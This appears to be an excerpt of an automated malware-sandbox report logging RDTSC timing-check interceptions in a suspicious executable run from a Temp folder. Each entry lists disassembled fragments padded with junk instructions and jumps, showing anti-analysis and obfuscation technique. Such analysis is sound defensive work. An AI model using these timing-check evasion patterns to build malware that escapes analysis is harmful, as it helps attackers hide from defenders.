Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110B67 second address: 5110BE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53C6A85h 0x00000009 or ax, 5FB6h 0x0000000e jmp 00007FC9F53C6A81h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC9F53C6A80h 0x0000001a sbb al, FFFFFFD8h 0x0000001d jmp 00007FC9F53C6A7Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FC9F53C6A86h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FC9F53C6A7Ah 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110BE1 second address: 5110BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110BE7 second address: 5110BEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51106C9 second address: 51106CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51106CF second address: 51106E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, 05h 0x00000011 mov bl, 94h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51106E9 second address: 51106F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51106F0 second address: 511075A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC9F53C6A87h 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC9F53C6A84h 0x00000016 add cx, E5F8h 0x0000001b jmp 00007FC9F53C6A7Bh 0x00000020 popfd 0x00000021 call 00007FC9F53C6A88h 0x00000026 mov bh, al 0x00000028 pop edi 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511075A second address: 511075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51105D3 second address: 51105F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51105F7 second address: 5110611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110611 second address: 5110627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110627 second address: 511062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511062B second address: 5110631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511033D second address: 5110341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110341 second address: 5110347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110347 second address: 5110358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD5Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110358 second address: 511035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511035C second address: 511036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511036B second address: 511036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511036F second address: 5110373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110373 second address: 5110379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110379 second address: 511039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53DFD5Ch 0x00000009 adc ch, 00000028h 0x0000000c jmp 00007FC9F53DFD5Bh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511039A second address: 51103AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f push edx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51103AC second address: 5110418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53DFD64h 0x00000009 and si, 11B8h 0x0000000e jmp 00007FC9F53DFD5Bh 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC9F53DFD62h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FC9F53DFD5Dh 0x0000002a sbb ch, 00000006h 0x0000002d jmp 00007FC9F53DFD61h 0x00000032 popfd 0x00000033 push eax 0x00000034 pop edx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 512031E second address: 5120322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120322 second address: 5120328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120328 second address: 51203BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC9F53C6A85h 0x00000013 or ax, 7476h 0x00000018 jmp 00007FC9F53C6A81h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov ax, 5B03h 0x00000026 pushfd 0x00000027 jmp 00007FC9F53C6A88h 0x0000002c xor ax, 78C8h 0x00000031 jmp 00007FC9F53C6A7Bh 0x00000036 popfd 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov ah, bh 0x0000003e pushfd 0x0000003f jmp 00007FC9F53C6A7Ch 0x00000044 adc cx, FB28h 0x00000049 jmp 00007FC9F53C6A7Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51203BA second address: 51203C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51203C0 second address: 51203C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51203C4 second address: 51203C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130513 second address: 5130535 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC9F53C6A86h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130535 second address: 513053A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513053A second address: 513054E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A80h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513054E second address: 513060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC9F53DFD5Dh 0x00000012 sub cx, C6A6h 0x00000017 jmp 00007FC9F53DFD61h 0x0000001c popfd 0x0000001d mov cx, 49D7h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 mov esi, 07389CCFh 0x0000002a pushfd 0x0000002b jmp 00007FC9F53DFD64h 0x00000030 or cx, 3778h 0x00000035 jmp 00007FC9F53DFD5Bh 0x0000003a popfd 0x0000003b popad 0x0000003c mov eax, dword ptr [ebp+08h] 0x0000003f pushad 0x00000040 mov ebx, eax 0x00000042 push eax 0x00000043 mov cl, bh 0x00000045 pop esi 0x00000046 popad 0x00000047 and dword ptr [eax], 00000000h 0x0000004a pushad 0x0000004b call 00007FC9F53DFD65h 0x00000050 jmp 00007FC9F53DFD60h 0x00000055 pop esi 0x00000056 jmp 00007FC9F53DFD5Bh 0x0000005b popad 0x0000005c and dword ptr [eax+04h], 00000000h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FC9F53DFD65h 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513060F second address: 513061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A7Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513061F second address: 5130623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130623 second address: 5130637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e mov eax, 3431705Bh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130637 second address: 5130647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD5Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51300FA second address: 51300FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51300FF second address: 513012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov ecx, edx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC9F53DFD66h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513012B second address: 5130131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130131 second address: 5130177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, 4Ah 0x0000000e pushfd 0x0000000f jmp 00007FC9F53DFD67h 0x00000014 add ax, 200Eh 0x00000019 jmp 00007FC9F53DFD69h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130177 second address: 5130187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A7Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51303EE second address: 5130421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f popad 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC9F53DFD5Ch 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51505BE second address: 51505C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51505C2 second address: 51505C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51505C8 second address: 51505DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A81h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51505DD second address: 515063B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ax, BAA3h 0x00000011 mov ah, 5Dh 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FC9F53DFD62h 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FC9F53DFD60h 0x00000020 mov ebp, esp 0x00000022 jmp 00007FC9F53DFD60h 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov ax, bx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 515063B second address: 5150641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150641 second address: 5150645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150645 second address: 5150714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f pushfd 0x00000010 jmp 00007FC9F53C6A7Bh 0x00000015 xor ch, FFFFFFEEh 0x00000018 jmp 00007FC9F53C6A89h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FC9F53C6A7Eh 0x00000025 mov eax, dword ptr [76FA65FCh] 0x0000002a jmp 00007FC9F53C6A80h 0x0000002f test eax, eax 0x00000031 jmp 00007FC9F53C6A80h 0x00000036 je 00007FCA67199D16h 0x0000003c jmp 00007FC9F53C6A80h 0x00000041 mov ecx, eax 0x00000043 jmp 00007FC9F53C6A80h 0x00000048 xor eax, dword ptr [ebp+08h] 0x0000004b jmp 00007FC9F53C6A81h 0x00000050 and ecx, 1Fh 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FC9F53C6A7Dh 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150714 second address: 515075A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC9F53DFD5Ch 0x00000012 or cx, 8EE8h 0x00000017 jmp 00007FC9F53DFD5Bh 0x0000001c popfd 0x0000001d push ecx 0x0000001e mov dx, D78Ah 0x00000022 pop edi 0x00000023 popad 0x00000024 leave 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov si, AE65h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 515075A second address: 5150761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 89h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150761 second address: 515079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 retn 0004h 0x0000000a nop 0x0000000b mov esi, eax 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 xor esi, dword ptr [00B02014h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c push eax 0x0000001d call 00007FC9F9A704F1h 0x00000022 push FFFFFFFEh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC9F53DFD5Bh 0x0000002d sbb ecx, 0E36138Eh 0x00000033 jmp 00007FC9F53DFD69h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100040 second address: 5100046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100046 second address: 510009A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FC9F53DFD5Bh 0x00000017 and ax, 930Eh 0x0000001c jmp 00007FC9F53DFD69h 0x00000021 popfd 0x00000022 call 00007FC9F53DFD60h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510009A second address: 51000A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51000A0 second address: 51000A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51000A4 second address: 51000BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51000BB second address: 51000F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC9F53DFD5Fh 0x0000000a sub ah, 0000007Eh 0x0000000d jmp 00007FC9F53DFD69h 0x00000012 popfd 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51000F6 second address: 5100109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100109 second address: 5100129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD63h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100129 second address: 5100141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A84h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100141 second address: 5100145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100145 second address: 51001AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b jmp 00007FC9F53C6A87h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 pushad 0x00000015 push esi 0x00000016 pop edi 0x00000017 mov ecx, 72773529h 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007FC9F53C6A7Fh 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 mov edx, esi 0x00000028 mov edx, eax 0x0000002a popad 0x0000002b mov ebx, dword ptr [ebp+10h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC9F53C6A89h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51001AA second address: 51001B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51001B0 second address: 51001B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51001B4 second address: 51001B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51001B8 second address: 5100216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC9F53C6A84h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov esi, 34592DCDh 0x00000017 jmp 00007FC9F53C6A7Ah 0x0000001c popad 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC9F53C6A7Dh 0x00000029 and eax, 0DE42256h 0x0000002f jmp 00007FC9F53C6A81h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100216 second address: 510022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510022D second address: 5100231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100231 second address: 5100235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
